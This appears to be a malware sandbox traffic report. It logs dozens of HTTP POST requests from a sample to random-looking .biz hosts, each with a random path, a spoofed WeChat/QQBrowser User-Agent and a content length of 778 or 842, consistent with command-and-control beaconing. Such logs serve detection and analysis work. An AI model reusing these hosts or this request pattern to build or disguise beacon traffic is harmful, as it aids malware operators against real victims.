                    Source: global trafficHTTP traffic detected: POST /dxdpaygfruq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tswjxcwwmwucbcyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ne HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /qmctu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sdgvcmfo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /wkalxigrfxgkug HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /brgveksk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sced HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /vbyllgxghq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cbqsfkmui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /dlovkaogrlu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /icppg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /tligtgmsbcb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tqu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wecjsxoyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /lspnhjimgtskiesm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xoyfxnplyoi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /rsiubvwiadnvvj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /jvecbp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /bbijserepxmxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /befoqrxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xnflybxi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /seyyaxvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hijuvcy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /lwhbygewh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xeyfbck HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /gqrpdchmrl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /bdghc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /hjumxfmpxqmv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qwcggmenbmxay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /mfqkfuggidiy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sfiqgauuimd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kxb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /iwfoslmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ctioat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cdgbrerrkvnm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /htadt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sjfhnuha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /buysfduhasc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hdbarkridfoxgkjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /yqurtsnxjff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xyvyee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /axuddidcqrj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /mhxmquroxp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tqibqwdnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /enwcfxnivhfhsw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vxgpxxcjmtsw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /nyf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /lydi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wxrjvmspt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /oncddhqibqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /srglonjeqll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cxvadgaccqflspy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /yxrsiv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /omsvgexhevatygbr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /smumomti HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
